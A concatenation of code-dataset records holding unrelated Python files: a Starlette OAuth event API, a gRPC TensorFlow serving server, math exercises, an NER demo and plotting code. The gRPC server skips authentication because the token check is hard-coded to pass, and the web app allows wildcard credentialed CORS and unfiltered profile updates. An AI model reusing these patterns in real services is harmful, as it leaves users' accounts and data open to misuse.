access_token_url='https://github.com/login/oauth/access_token',\n access_token_params=None,\n authorize_url='https://github.com/login/oauth/authorize',\n authorize_params=None,\n api_base_url='https://api.github.com/',\n client_kwargs={'scope': 'user:email read:user'},\n)\n\n# Entities\n\nactivities = sqlalchemy.Table(\n \"activities\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.String, primary_key=True),\n sqlalchemy.Column(\"name\", sqlalchemy.String),\n sqlalchemy.Column(\"active\", sqlalchemy.Boolean),\n)\n\nusers = sqlalchemy.Table(\n \"users\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.String, primary_key=True),\n sqlalchemy.Column(\"email\", sqlalchemy.String),\n sqlalchemy.Column(\"name\", sqlalchemy.String),\n sqlalchemy.Column(\"picture\", sqlalchemy.String),\n sqlalchemy.Column(\"height\", sqlalchemy.Float),\n sqlalchemy.Column(\"weight\", sqlalchemy.Float),\n sqlalchemy.Column(\"birth_date\", sqlalchemy.Date),\n sqlalchemy.Column(\"register_date\", sqlalchemy.Date),\n sqlalchemy.Column(\"telegram\", sqlalchemy.String),\n sqlalchemy.Column(\"instagram\", sqlalchemy.String),\n sqlalchemy.Column(\"vk\", sqlalchemy.String)\n)\n\nevents = sqlalchemy.Table(\n \"events\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.String, primary_key=True),\n sqlalchemy.Column(\"title\", sqlalchemy.String),\n sqlalchemy.Column(\"start_time\", sqlalchemy.DateTime),\n sqlalchemy.Column(\"city\", sqlalchemy.String),\n sqlalchemy.Column(\"place\", sqlalchemy.String),\n sqlalchemy.Column(\"paid\", sqlalchemy.Boolean),\n sqlalchemy.Column(\"description\", sqlalchemy.String),\n sqlalchemy.Column(\"organization_description\", sqlalchemy.String),\n sqlalchemy.Column(\"paid_description\", sqlalchemy.String),\n sqlalchemy.Column(\"activity\", sqlalchemy.String),\n sqlalchemy.Column(\"section\", sqlalchemy.Boolean)\n)\n\nevent_visitors = sqlalchemy.Table(\n \"event_visitors\",\n metadata,\n sqlalchemy.Column(\"user_id\", sqlalchemy.String),\n sqlalchemy.Column(\"event_id\", sqlalchemy.String)\n)\n\nevent_likes = sqlalchemy.Table(\n \"event_likes\",\n metadata,\n sqlalchemy.Column(\"user_id\", sqlalchemy.String),\n sqlalchemy.Column(\"event_id\", sqlalchemy.String)\n)\n\ndatabase = databases.Database(DATABASE_URL)\n\n\n# Routing\n\nasync def login(request: Request):\n redirect_uri = 'https://api.healthy.adds.md/auth/' + request.path_params['provider']\n return await oauth.create_client(request.path_params['provider']).authorize_redirect(request, redirect_uri)\n\n\nasync def auth(request: Request):\n if request.path_params['provider'] == \"google\":\n token = await oauth.google.authorize_access_token(request)\n user = await oauth.google.parse_id_token(request, token)\n\n users_found = await database.fetch_all(users.count().where(users.c.email == user[\"email\"]))\n users_found = users_found[0][0]\n\n if users_found == 0:\n await database.execute(\n users.insert().values(\n email=user[\"email\"],\n name=user[\"name\"],\n picture=user[\"picture\"]\n )\n )\n\n user_found = await database.fetch_one(users.select().where(users.c.email == user[\"email\"]))\n encoded_jwt = jwt.encode({\n \"username\": str(user_found['id']),\n \"email\": user[\"email\"],\n \"name\": user[\"name\"],\n \"picture\": user[\"picture\"]\n }, config(\"JWT_KEY\"), algorithm='HS256')\n\n return RedirectResponse(\"https://healthy.adds.md/login/\" + encoded_jwt.decode(\"utf-8\"))\n\n\napp = Starlette(\n debug=True,\n routes=[\n Route('/login/{provider}', endpoint=login),\n Route('/auth/{provider}', endpoint=auth),\n ],\n on_startup=[database.connect],\n on_shutdown=[database.disconnect],\n middleware=[\n Middleware(CORSMiddleware, allow_origins=['*'], allow_methods=['*'], allow_headers=['*'],\n allow_credentials=True),\n Middleware(SessionMiddleware, secret_key=config('SESSION_SECRET')),\n Middleware(AuthenticationMiddleware, backend=JWTAuthenticationBackend(\n secret_key=config(\"JWT_KEY\"),\n prefix='JWT'\n ))\n ]\n)\n\n\n@app.route(\"/profile\", [\"GET\"])\n@requires('authenticated')\nasync def profile(request):\n user = await database.fetch_one(users.select().where(users.c.id == request.user.username))\n return JSONResponse({\n \"user_id\": str(user['id']),\n \"email\": user['email'],\n \"picture\": user['picture'],\n \"height\": user['height'],\n \"weight\": user['weight'],\n \"birth_date\": user['birth_date'].strftime('%Y-%m-%d') if user['birth_date'] is not None else None,\n \"register_date\": user['register_date'].strftime('%Y-%m-%d %H:%M'),\n \"telegram\": user['telegram'],\n \"instagram\": user['instagram'],\n \"vk\": user['vk']\n })\n\n\n@app.route(\"/profile\", [\"POST\"])\n@requires('authenticated')\nasync def profile_edit(request):\n req = await request.json()\n\n query = users.update().values(**req).where(users.c.id == request.user.username)\n\n await database.execute(query)\n\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/activities\")\nasync def list_activities(request):\n query = activities.select()\n results = await database.fetch_all(query)\n return JSONResponse([\n {\n \"id\": result[\"id\"],\n \"name\": result[\"name\"]\n } for result in results\n ])\n\n\n@app.route(\"/event\", [\"POST\"])\n@requires('authenticated')\nasync def add_event(request):\n req = await request.json()\n await database.execute(\n events.insert().values(\n title=req['title'],\n start_time=datetime.strptime(req['start_time'], '%Y-%m-%d %H:%M'),\n city=req['city'],\n place=req['place'],\n paid=req['paid'],\n description=req['description'],\n organization_description=req['organization_description'],\n paid_description=req['paid_description'],\n activity=req['activity'],\n section=req['section']\n )\n )\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/event/participation\", [\"POST\"])\n@requires('authenticated')\nasync def participate(request):\n await database.execute(\n event_visitors.insert().values(\n user_id=request.user.username,\n event_id=request.query_params['event']\n )\n )\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/event/participation\", [\"DELETE\"])\n@requires('authenticated')\nasync def participate(request):\n await database.execute(\n event_visitors.delete().where(\n and_(\n event_visitors.c.user_id == request.user.username,\n event_visitors.c.event_id == request.query_params['event']\n )\n )\n )\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/event/participation\", [\"GET\"])\nasync def get_participators(request):\n query = text(\n \"\"\"\n select u.id, u.name, u.picture from event_visitors ev\n join users u on ev.user_id = u.id\n where ev.event_id = :event_id\n \"\"\"\n )\n query = query.bindparams(event_id=request.query_params['event'])\n participants = await database.fetch_all(\n query\n )\n\n return JSONResponse([{\n \"user_id\": str(p['id']),\n \"picture\": p['picture'],\n \"name\": p['name']\n } for p in participants])\n\n\n@app.route(\"/event/like\", [\"POST\"])\n@requires('authenticated')\nasync def participate(request):\n await database.execute(\n event_likes.insert().values(\n user_id=request.user.username,\n event_id=request.query_params['event']\n )\n )\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/event/like\", [\"DELETE\"])\n@requires('authenticated')\nasync def participate(request):\n await database.execute(\n event_likes.delete().where(\n and_(\n event_visitors.c.user_id == request.user.username,\n event_visitors.c.event_id == request.query_params['event']\n )\n )\n )\n return JSONResponse({\"status\": \"ok\"})\n\n\n@app.route(\"/event\", [\"GET\"])\nasync def get_events(request):\n date_from = datetime.now()\n if 'date_from' in request.query_params and request.query_params['date_from'] is not None:\n date_from = datetime.strptime(request.query_params['date_from'], '%Y-%m-%d')\n\n date_to = None\n if 'date_to' in request.query_params and request.query_params['date_to'] is not None:\n date_to = datetime.strptime(request.query_params['date_to'], '%Y-%m-%d')\n\n if date_to is not None:\n query = and_(\n events.c.start_time >= date_from,\n events.c.start_time <= date_to\n )\n else:\n query = events.c.start_time >= date_from\n\n if 'paid' in request.query_params and request.query_params['paid'] is not None:\n query = and_(\n query,\n events.c.paid == (request.query_params['paid'] in ['1', 1, 'true'])\n )\n\n if 'activity' in request.query_params and request.query_params['activity'] is not None:\n query = and_(\n query,\n events.c.activity == request.query_params['activity']\n )\n\n if 'section' in request.query_params and request.query_params['section'] is not None:\n query = and_(\n query,\n events.c.section == request.query_params['section']\n )\n\n if 'id' in request.query_params and request.query_params['id'] is not None:\n query = and_(\n query,\n events.c.id == request.query_params['id']\n )\n\n results = await database.fetch_all(\n events.select(query)\n )\n\n likes = []\n\n if request.user.is_authenticated:\n likes = await database.fetch_all(\n event_likes.select().where(\n event_likes.c.user_id == request.user.username\n )\n )\n\n return JSONResponse(\n [{\n \"id\": str(r[\"id\"]),\n \"title\": r[\"title\"],\n \"start_time\": r[\"start_time\"].strftime('%Y-%m-%d %H:%M'),\n \"city\": r[\"city\"],\n \"place\": r[\"place\"],\n \"paid\": r[\"paid\"],\n \"description\": r[\"description\"],\n \"organization_description\": r[\"organization_description\"],\n \"paid_description\": r[\"paid_description\"],\n \"activity\": r[\"activity\"],\n \"section\": r[\"section\"],\n \"like\": len(list(filter(lambda like: str(like['event_id']) == str(r[\"id\"]), likes))) > 0\n } for r in results]\n )\n\n\nif __name__ == '__main__':\n uvicorn.run(app, host='0.0.0.0', port=8001)\n","sub_path":"healthy.py","file_name":"healthy.py","file_ext":"py","file_size_in_byte":11733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"568499635","text":"\"\"\"grpc server\"\"\"\r\nfrom concurrent import futures\r\nfrom datetime import datetime\r\nimport os\r\nimport sys\r\nimport time\r\nimport errno\r\nimport logging\r\nimport threading\r\nimport json\r\nimport grpc\r\nimport tensorflow as tf\r\nimport pandas as pd\r\n\r\nLOG=logging.getLogger(__name__)\r\nLOG.setLevel(logging.INFO)\r\nLOG.addHandler(logging.StreamHandler(stream=sys.stdout))\r\n# Disabling this pylint error after checking that this line adheres to\r\n# tensorflow documentation\r\n# pylint: disable=E0611\r\nfrom tensorflow.python.framework import (\r\n tensor_util,\r\n dtypes\r\n)\r\nfrom mlpkitsecurity import SecurityError\r\nfrom tensorflow_serving.apis import (\r\n predict_pb2 as tensorflow__serving_dot_apis_dot_predict__pb2,\r\n prediction_service_pb2 as tensorflow__serving_dot_apis_dot_prediction_service__pb2,\r\n classification_pb2 as tensorflow__serving_dot_apis_dot_classification__pb2\r\n)\r\nfrom mlfmodelserver.token_validator import TokenValidator\r\nfrom mlfmodelserver.healthcheck import healthcheck_pb2 as healthcheck_dot_healthcheck__pb2, \\\r\n healthcheck_pb2_grpc as healthcheck_dot_healthcheck__pb2__grpc\r\n\r\nINPUT_TYPE_BYTES = 0\r\nINPUT_TYPE_INTS = 1\r\nINPUT_TYPE_FLOATS = 2\r\nINPUT_TYPE_DOUBLES = 3\r\nINPUT_TYPE_STRINGS = 4\r\n_ONE_DAY_IN_SECONDS = 60 * 60 * 24\r\n\r\n\r\nclass Metric:\r\n \"\"\"\r\n Metric class for abstracting all future metric reporting e.g Prometheus\r\n \"\"\"\r\n\r\n def __init__(self, name, model_metrics):\r\n self.name = name\r\n self.metrics = model_metrics\r\n\r\n def report(self):\r\n \"\"\"\r\n Log metrics\r\n \"\"\"\r\n LOG.info(self.metrics)\r\n\r\n\r\nclass Servicer(tensorflow__serving_dot_apis_dot_prediction_service__pb2.PredictionServiceServicer):\r\n \"\"\"\r\n class Servicer\r\n \"\"\"\r\n\r\n def _Validations(self, request, context):\r\n try:\r\n metadata = context.invocation_metadata()\r\n\r\n token_validator = TokenValidator(context, metadata)\r\n LOG.info(\"Model Name %s\", request.model_spec.name)\r\n LOG.info(\"Start of validating token\")\r\n token_result = True#token_validator.validate_token()\r\n\r\n if request.model_spec.name != self.model.model_name:\r\n LOG.error(\"Model spec name and model env name does not match\")\r\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\r\n raise NotImplementedError('Model spec name and model env does not match' +\r\n str('Model spec name' + request.model_spec.name))\r\n return False\r\n if request.model_spec.name is None:\r\n LOG.error(\"Model spec name and model env name does not match\")\r\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\r\n raise NotImplementedError('Given Model Not Loaded' +\r\n str('Model spec name' + request.model_spec.name))\r\n return False\r\n\r\n if token_result is True:\r\n LOG.info('token validated successfully')\r\n context.set_code(grpc.StatusCode.OK)\r\n context.set_details(self.model.model_name)\r\n return True\r\n\r\n return False\r\n except SecurityError as se:\r\n s = getattr(se, 'message', str(se))\r\n raise SecurityError(s)\r\n return False\r\n\r\n\r\n\r\n def Classify(self, request, context):\r\n try:\r\n example = request.input.example_list.examples[0]\r\n\r\n start_time_millis = self.getCurrentTimeinMillis()\r\n time_1 = datetime.now()\r\n if self._Validations(request, context) is True:\r\n time_2 = datetime.now()\r\n\r\n example = request.input.example_list.examples[0]\r\n\r\n idx = 0\r\n final_input = []\r\n final_labels = []\r\n for k in example.features.feature.keys():\r\n v = example.features.feature[k]\r\n int_list_value = list(v.int64_list.value)\r\n float_list_value = list(v.float_list.value)\r\n byte_list_value = list(v.bytes_list.value)\r\n\r\n if len(int_list_value) > 0:\r\n final_input.append(int_list_value)\r\n final_labels.append(k)\r\n elif len(float_list_value) > 0:\r\n final_input.append(float_list_value)\r\n final_labels.append(k)\r\n elif len(byte_list_value) > 0:\r\n final_input.append(byte_list_value)\r\n final_labels.append(k)\r\n else:\r\n LOG.info(\"Input param empty, ignoring it\")\r\n idx = idx + 1\r\n\r\n classification_request = pd.DataFrame.from_records(list(zip(*final_input)), columns=final_labels)\r\n\r\n try:\r\n classification_outputs = self.model.wrapper_classification_func(classification_request)\r\n LOG.info(\"the output from the model's classification function %s\", classification_outputs)\r\n response = tensorflow__serving_dot_apis_dot_classification__pb2.ClassificationResponse()\r\n\r\n except grpc.RpcError as grpc_error:\r\n end_time_millis = self.getCurrentTimeinMillis()\r\n LOG.error(\"Error while doing Classification\")\r\n requestDurationInMillis = str(end_time_millis - start_time_millis)\r\n self.logRequests(self.model.model_name, requestDurationInMillis, str(0))\r\n LOG.error(\"grpc error : %s\", str(grpc_error))\r\n s = getattr(grpc_error, 'message', str(grpc_error))\r\n raise grpc.RpcError(grpc_error)\r\n return None\r\n\r\n classifications = []\r\n for idx in range(0, classification_request.shape[0]):\r\n classes = []\r\n classification = tensorflow__serving_dot_apis_dot_classification__pb2.Classifications()\r\n for k, v in classification_outputs.items():\r\n class_data = tensorflow__serving_dot_apis_dot_classification__pb2.Class()\r\n class_data.label = \"Class-\" + k\r\n class_data.score = v[idx]\r\n classes.append(class_data)\r\n classification.classes.extend(classes)\r\n classifications.append(classification)\r\n response.result.classifications.extend(classifications)\r\n\r\n return response\r\n else:\r\n return None\r\n except Exception as ex:\r\n s = getattr(ex, 'message', str(ex))\r\n raise Exception(s)\r\n return None\r\n\r\n\r\n def Predict(self, request, context):\r\n try:\r\n start_time_millis = self.getCurrentTimeinMillis()\r\n time_1 = datetime.now()\r\n if self._Validations(request, context):\r\n time_2 = datetime.now()\r\n predict_request = {}\r\n\r\n for k, v in request.inputs.items():\r\n predict_request[k] = tensor_util.MakeNdarray(request.inputs[k])\r\n if v.dtype == dtypes.string:\r\n predict_request[k] = predict_request[k].astype(str)\r\n\r\n time_3 = datetime.now()\r\n\r\n for k, v in predict_request.items():\r\n LOG.info(\"the key :%s\", k)\r\n LOG.info(\"the value :%s\", v)\r\n # Add the more specific try catch request for predict request\r\n\r\n try:\r\n predict_outputs = self.model.wrapper_predict_func(predict_request)\r\n LOG.info(\"the output from the model's predict function %s\", predict_outputs)\r\n response = tensorflow__serving_dot_apis_dot_predict__pb2.PredictResponse()\r\n except grpc.RpcError as grpc_error:\r\n end_time_millis = self.getCurrentTimeinMillis()\r\n LOG.error(\"Error while doing Prediction\")\r\n requestDurationInMillis = str(end_time_millis - start_time_millis)\r\n self.logRequests(self.model.model_name, requestDurationInMillis, str(0))\r\n LOG.error(\"grpc error : %s\", str(grpc_error))\r\n s = getattr(grpc_error, 'message', str(grpc_error))\r\n raise grpc.RpcError(grpc_error)\r\n return None\r\n\r\n for k, v in predict_outputs.items():\r\n # Disabling this pylint error after checking that this line adheres to\r\n # tensorflow documentation\r\n # pylint: disable=E1101\r\n response.outputs[k].CopyFrom(tf.contrib.util.make_tensor_proto(v))\r\n ''' here print the response time taken to serve the request '''\r\n\r\n time_4 = datetime.now()\r\n end_time_millis = self.getCurrentTimeinMillis()\r\n\r\n validation_time_ms = (time_2 - time_1).microseconds\r\n parse_time = (time_3 - time_2).microseconds\r\n handle_time = (time_4 - time_3).microseconds\r\n model_metrics = {\"mlf_mc_model_name\": self.model.model_name,\r\n \"mlf_mc_token_validation_time_ms\": validation_time_ms / 1000,\r\n \"mlf_mc_parse_time_ms\": parse_time / 1000,\r\n \"mlf_mc_handle_time_ms\": handle_time / 1000\r\n }\r\n self.collect_metrics(self.model.model_name, model_metrics)\r\n requestDurationInMillis = str(end_time_millis - start_time_millis)\r\n self.logRequests(self.model.model_name, requestDurationInMillis, str(1))\r\n return response\r\n else:\r\n requestDurationInMillis = self.getCurrentTimeinMillis()\r\n LOG.error(\"Error while validating JWT token, token not validated successfully\")\r\n self.logRequests(self.model.model_name, requestDurationInMillis, str(0))\r\n return None\r\n\r\n except Exception as ex:\r\n s = getattr(ex, 'message', str(ex))\r\n raise Exception(s)\r\n return None\r\n\r\n def logRequests(self, model_name, requestDurationInMillis, success):\r\n current_time = datetime.now().isoformat()\r\n LOG.info(current_time + \" :\" + \" ModelName: [\" + str(model_name) + \"] Success: [\" + success + \"]\" +\r\n \" RequestDurationMillis: [\" + str(requestDurationInMillis) + \"]\")\r\n\r\n def collect_metrics(self, model_name, model_metrics):\r\n metrics = Metric(model_name, model_metrics)\r\n metrics.report()\r\n\r\n def getCurrentTimeinMillis(self):\r\n return int(round(time.time() * 1000))\r\n\r\n def Check(self, request, context):\r\n # Disabling this pylint error as the healthcheck\r\n # implementation follows grpc documentation\r\n # pylint: disable=E1101\r\n if self.pod_health_status_path:\r\n ''' Read the readiness/health status from the health status log file'''\r\n try:\r\n with open('{}/{}.json'.format(self.pod_health_status_path, self.model_env['model_container_pod_name'])) \\\r\n as json_file:\r\n health_status = json.load(json_file)\r\n if health_status['Status'] == '1':\r\n return healthcheck_dot_healthcheck__pb2.HealthCheckResponse(status=\r\n healthcheck_dot_healthcheck__pb2.\r\n HealthCheckResponse.ServingStatus.\r\n Name(1))\r\n else:\r\n return healthcheck_dot_healthcheck__pb2.HealthCheckResponse(status=\r\n healthcheck_dot_healthcheck__pb2.\r\n HealthCheckResponse.ServingStatus.\r\n Name(2))\r\n except IOError:\r\n LOG.info(\"IO Error\")\r\n return healthcheck_dot_healthcheck__pb2.HealthCheckResponse(status=healthcheck_dot_healthcheck__pb2.\r\n HealthCheckResponse.ServingStatus.Name(\r\n 0))\r\n else:\r\n return healthcheck_dot_healthcheck__pb2.HealthCheckResponse(status=healthcheck_dot_healthcheck__pb2.\r\n HealthCheckResponse.ServingStatus.Name(1))\r\n\r\n\r\nclass ModelContainerBase(object):\r\n def predict_ints(self, inputs):\r\n pass\r\n\r\n def predict_floats(self, inputs):\r\n pass\r\n\r\n def predict_doubles(self, inputs):\r\n pass\r\n\r\n def predict_bytes(self, inputs):\r\n pass\r\n\r\n def predict_strings(self, inputs):\r\n pass\r\n\r\n\r\n# Inheriting the base class 'Thread'\r\nclass AsyncWrite(threading.Thread):\r\n def __init__(self, model_env, model_health_status_log, pod_health_status_path):\r\n # calling superclass init\r\n threading.Thread.__init__(self)\r\n self.model_env = model_env\r\n self.model_health_status_log = model_health_status_log\r\n self.pod_health_status_path = pod_health_status_path\r\n\r\n def run(self):\r\n while True:\r\n with open('{}/{}.json'.format(self.pod_health_status_path,\r\n self.model_env['model_container_pod_name']),\r\n mode='w') as outfile:\r\n print('Updating Container Health Status file ' + self.pod_health_status_path)\r\n LOG.info(\"Health status log %s\",self.model_health_status_log)\r\n json.dump(self.model_health_status_log, outfile)\r\n\r\n time.sleep(int(self.model_env['status_exporter_sleep_time']))\r\n\r\n\r\nclass GrpcServer:\r\n\r\n def get_model_health_status(self):\r\n return self.model_health_status\r\n\r\n def set_model_health_status(self, model_health_status):\r\n self.model_health_status = model_health_status\r\n\r\n def read_env(self):\r\n model_env = dict()\r\n model_env['models_health_base_path'] = os.environ.get('MODELS_HEALTH_BASE_PATH', '/')\r\n model_env['model_container_id'] = os.environ.get('MODEL_CONTAINER_ID')\r\n model_env['model_container_pod_name'] = os.environ.get('MODEL_CONTAINER_POD_NAME', 'pod_name')\r\n model_env['status_exporter_sleep_time'] = os.environ.get('STATUS_EXPORTER_SLEEP_TIME', 60)\r\n return model_env\r\n\r\n def createhealthstatuslog(self):\r\n if self.model_env['models_health_base_path'] != '/':\r\n self.pod_health_status_path = '{}/health/{}'.format(self.model_env['models_health_base_path'],\r\n self.model_env['model_container_id'])\r\n\r\n def __init__(self):\r\n self.model_health_status = None\r\n self.pod_health_status_path = None\r\n self.model_env = self.read_env()\r\n self.createhealthstatuslog()\r\n\r\n def start(self, model, port):\r\n LOG.info(\"Starting gRPC Server\")\r\n model_env = self.read_env()\r\n servicer = Servicer()\r\n servicer.model = model\r\n# servicer.pod_health_status_path = self.pod_health_status_path\r\n servicer.model_env = model_env\r\n\r\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\r\n\r\n tensorflow__serving_dot_apis_dot_prediction_service__pb2. \\\r\n add_PredictionServiceServicer_to_server(servicer, server)\r\n\r\n# healthcheck_dot_healthcheck__pb2__grpc. \\\r\n# add_HealthServicer_to_server(servicer, server)\r\n\r\n# with open('{}/{}.json'.format(self.pod_health_status_path, self.model_env['model_container_pod_name'])) as outfile:\r\n# LOG.info('Reading Container Health Status file %s', str(self.pod_health_status_path))\r\n# LOG.debug(\"Json file content %s \",str(outfile))\r\n# self.model_health_status = json.load(outfile)\r\n\r\n server.add_insecure_port(\"[::]:%s\" % port)\r\n server.start()\r\n LOG.info('Server started successfully on port: %s ...', str(port))\r\n LOG.info('Enjoy!')\r\n\r\n if self.pod_health_status_path:\r\n healthexporter = AsyncWrite(model_env, self.get_model_health_status(),\r\n self.pod_health_status_path)\r\n healthexporter.start()\r\n healthexporter.join()\r\n\r\n try:\r\n while True:\r\n time.sleep(_ONE_DAY_IN_SECONDS)\r\n except KeyboardInterrupt:\r\n server.stop(0)\r\n","sub_path":"mlfmodelserver/grpc_server.py","file_name":"grpc_server.py","file_ext":"py","file_size_in_byte":16937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"236868071","text":"# submitted to info@codingthematrix.com\n\n# 2.9.4 quiz\ndef list_dot(u, v):\n return sum([a * b for (a, b) in zip(u, v)])\n\n# 2.9.15 quiz book answer\ndef dot_product_list(needle, haystack):\n s = len(needle)\n return [list_dot(needle, haystack[i:i+s])\n for i in range(len(haystack) - s)]\n\n# 2.9.15 corrected to address off-by-one error (\"s + 1\")\ndef dot_product_list_corrected(needle, haystack):\n s = len(needle)\n return [list_dot(needle, haystack[i:i+s])\n for i in range(len(haystack) - s + 1)]\n\n\"\"\"\nCalculates the result based on the \"is_original\" boolean \n\nOutput: \n{quiz} [Original|Corrected] {answer} == {result}: {result == answer} \n\"\"\"\ndef print_result(is_original, quiz, needle, haystack, answer):\n result = dot_product_list(needle, haystack) if is_original \\\n else dot_product_list_corrected(needle, haystack)\n print((\"{0} \" + (\"Original\" if is_original else \"Corrected\") + \" {1} == {2}: {3}\")\n .format(quiz, answer, result, result == answer))\n\n\nif __name__ == \"__main__\":\n haystack_2_9_13 = [1, -1, 1, 1, 1, -1, 1, 1, 1]\n needle_2_9_13 = [1, -1, 1, 1, -1, 1]\n answer_2_9_13 = [2, 2, 0, 0]\n print_result(True, \"2.9.13\", needle_2_9_13, haystack_2_9_13, answer_2_9_13)\n print_result(False, \"2.9.13\", needle_2_9_13, haystack_2_9_13, answer_2_9_13)\n\n haystack_2_9_14 = [1, 2, 3, 4, 5, 6]\n needle_2_9_14 = [1, 2, 3]\n answer_2_9_14 = [14, 20, 26, 32]\n print_result(True, \"2.9.14\", needle_2_9_14, haystack_2_9_14, answer_2_9_14)\n print_result(False, \"2.9.14\", needle_2_9_14, haystack_2_9_14, answer_2_9_14)\n\n\n","sub_path":"chapter/2/quiz_2_9_15_errata.py","file_name":"quiz_2_9_15_errata.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"367532328","text":"import collections\n\n\nclass Solution:\n def countPairs(self, a) -> int:\n mod = 10 ** 9 + 7\n power2 = [2 ** i for i in range(41)]\n count = collections.Counter(a)\n res = 0\n for k in count:\n for p in power2:\n if k == p - k:\n res += (count[k] * (count[k] - 1) // 2) % mod\n elif k < p - k:\n res += (count[k] * count.get(p - k, 0)) % mod\n return res\n\n\ns = Solution()\nprint(s.countPairs([1, 3, 5, 7, 9]))\nprint(s.countPairs([1, 1, 1, 3, 3, 3, 7]))\n","sub_path":"leetcode/2021/contest/weekly-222/Contest2.py","file_name":"Contest2.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"331482328","text":"# Distinct primes factors\nfrom time import time\n\nstart = time()\n\n\ndef pfactors(n): # here is the function returns prime factors\n pfs = []\n p = 2\n while p * p <= n: #\n if not n % p:\n if len(pfs) > 0 and not pfs[-1] % p:\n pfs[-1] *= p\n else:\n pfs.append(p)\n n //= p\n elif p == 2:\n p += 1\n else:\n p += 2\n if n > 1:\n if len(pfs) > 0 and not pfs[-1] % n:\n pfs[-1] *= n\n else:\n pfs.append(n)\n return pfs\n\n\ndef e47():\n n = 123845 # 16th prime is 53, so here is the middle: 47*31*17*5, and it's 10 times faster\n total = 0\n while total < 4:\n pfsn = pfactors(n)\n if not len(pfsn) % 4:\n total += 1\n else:\n total = 0\n n += 1\n return n - 4\n\n\nprint(e47()) # 134043\nprint('Runtime =', time() - start)\n","sub_path":"euler47_Distinct_primes_factors.py","file_name":"euler47_Distinct_primes_factors.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"609186356","text":"import asyncio\nimport re\nfrom c2dh_nerd.ner.flair import FlairNer\nfrom c2dh_nerd.util.routes import json_dumps\nfrom spacy.lang.en import English\n\nTEXT = '''\nLe président de la République a convié le nouveau premier ministre britannique à une visite en France, indique une source à l'Élysée.\n\nEmmanuel Macron et Boris Johnson, élu mardi 23 juillet à la tête du Parti conservateur et successeur désigné de Theresa May à la tête du gouvernement britannique, s'entretiendront du Brexit dans les prochaines semaines, «dans le respect des exigences de l'Union européenne», a indiqué une source à l'Élysée.\n'''\n\nsentence_splitter = English()\nsentence_splitter.add_pipe(sentence_splitter.create_pipe(\"sentencizer\", {\"punct_chars\": [\".\", \"!\", \"?\", \";\"]}))\n\ndef text_to_sentences(text):\n if (len(text.strip()) == 0):\n return []\n\n doc = sentence_splitter(text)\n return [s.text for s in doc.sents]\n\n\n\nsentences = text_to_sentences(TEXT)\n\nner_en = FlairNer(model_name='ner')\nner_fr = FlairNer(model_name='fr-ner')\nner_mul = FlairNer(model_name='ner-multi')\n\ndef normalise_entity(e):\n return re.sub(r'^[^0-9a-zA-Z]*(.+?)[^0-9a-zA-Z]*$', r'\\1', str(e))\n\nasync def main():\n for s in sentences:\n print(s)\n\n for ner, label in [(ner_en, 'en'), (ner_fr, 'fr'), (ner_mul, 'multilang')]:\n print(f'NER {label}:')\n \n result = await ner.extract(sentences)\n\n for e in result.entities:\n print(f\"{e.tag}: {normalise_entity(e.entity)} = {e.score}\")\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\nloop.close()\n\n","sub_path":"examples/flair_ner.py","file_name":"flair_ner.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"474114667","text":"# -*- coding: UTF-8 -*-\nimport logging\n\n\nclass LogUtil:\n\n def __init__(self, filename):\n self.filename = filename\n\n def logger(self):\n # 创建一个日志记录器\n logger = logging.getLogger(\"logger\")\n logger.setLevel(logging.ERROR)\n # 创建一个日志处理器\n # 这里需要正确填写路径和文件名,拼成一个字符串,最终生成一个log文件\n handler = logging.FileHandler(filename= self.filename)\n # 设置日志级别\n handler.setLevel(logging.ERROR)\n # 创建一个日志格式器\n formats = logging.Formatter('%(asctime)s %(levelname)s: %(message)s',\n datefmt='[%Y/%m/%d %I:%M:%S]')\n # 将日志格式器添加到日志处理器中\n handler.setFormatter(formats)\n # 将日志处理器添加到日志记录器中\n logger.addHandler(handler)\n return logger\n","sub_path":"itnest_spider/utils/log_utils.py","file_name":"log_utils.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"142019564","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport networkx as nx\nimport string\n\nfrom matplotlib.widgets import Slider\nfrom matplotlib import gridspec\nfrom statistics import mean, stdev\n\n\nclass LinkedPlotter:\n \"\"\"\n Plots a graph and line plots in user-specified axes.\n\n There is a one-to-one pairing between nodes in the graph and curves provided, such that if a user hovers their mouse\n over one of the nodes, the corresponding curve in the line plots will be outlined. Furthermore, each node in the\n graph is colored according to its contribution at time-step k, where k is chosen via a slider in the bottom of the\n figure.\n\n Params:\n graph: Graph to be plotted.\n curves: List of curves to be plotted. Each element is a list [xs, ys], where xs and ys are respectively a list\n of the x and y coordinates of the points to be plotted.\n ax_graph: The axis in which the graph should be plotted.\n ax_curves: The axis in which the curves should be plotted.\n \"\"\"\n def __init__(self, graph, curves, ax_graph, ax_curves, fig, circle=True, country=None):\n plt.subplots_adjust(left=0.25, bottom=0.25)\n self.curves = curves\n self.ax_graph = ax_graph\n self.ax_curves = ax_curves\n self.fig = fig\n\n # Plot graph, nodes are color-coded\n colors = [curve[1][-1] for curve in self.curves]\n\n if country != None:\n # Plot country as letters\n assert len(list(string.ascii_lowercase)) >= len(country), 'More countries than letters in 